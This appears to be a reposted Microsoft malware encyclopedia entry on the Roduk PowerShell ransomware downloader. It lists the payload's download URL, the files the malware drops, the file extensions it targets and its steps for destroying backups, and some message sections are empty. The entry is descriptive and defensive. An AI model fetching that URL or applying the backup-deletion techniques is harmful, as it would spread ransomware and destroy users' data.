Home / malware TrojanDownloader:PowerShell/Roduk.A
First posted on 04 June 2015.
Source: MicrosoftAliases :
There are no other names known for TrojanDownloader:PowerShell/Roduk.A.
Explanation :
Threat behavior
Installation
This threat is a detection for one of Ransom:Powershell/Roduk PowerShell file component that downloads and runs Ransom:Powershell/Roduk through HTTP:
- http://193.230.220.38/wall/encrypt.ps1
It can create the following files on your PC:
- c:\1\locked.bmp - ransom wallpaper image
- c:\1\reflect.dll - detected as Ransom:Win32/Roduk.A!dll
- c:\1\t.dll - detected as Ransom:Win32/Roduk.A!dll
- %desktop%\encrypted.htm - list of encrypted files
- %desktop%\qwer.html - ransom html page
- %desktop%\qwer2.html - ransom html page
Payload
Encrypts your files
This threat can search your PC for any files with the following extensions:
- .ai
- .crt
- .csv
- .db
- .doc
- .docm
- .docx
- .dotx
- .gif
- .jpeg
- .jpg
- .lnk
- .mp3
- .msi
- .ods
- .one
- .ost
- .p12
- .pem
- .pps
- .ppsx
- .ppt
- .pptx
- .psd
- .pst
- .pub
- .rar
- .raw
- .rtf
- .tif
- .txt
- .vsdx
- .wma
- .xls
- .xlsm
- .xlsx
- .xml
- .zip
It encrypts any files that it finds and displays the following messages:
Deletes backup files
This threat also tries to stop you from restoring your files from backup. It does this by:
- Deleting shadow files to prevent you from restoring your files from a local backup
- Disabling Startup Repair and Windows Error Recovery on system startup
- Disabling System Restore
Analysis by Jireh Sanico
Symptoms
The following can indicate that you have this threat on your PC:
- You have these files:
- c:\1\locked.bmp - ransom wallpaper image
- c:\1\reflect.dll - detected as Ransom:Win32/Roduk.A!dll
- c:\1\t.dll - detected as Ransom:Win32/Roduk.A!dll
- %desktop%\encrypted.htm - list of encrypted files
- %desktop%\qwer.html - ransom html page
- %desktop%\qwer2.html - ransom html page
- You see these messages:
Last update 04 June 2015
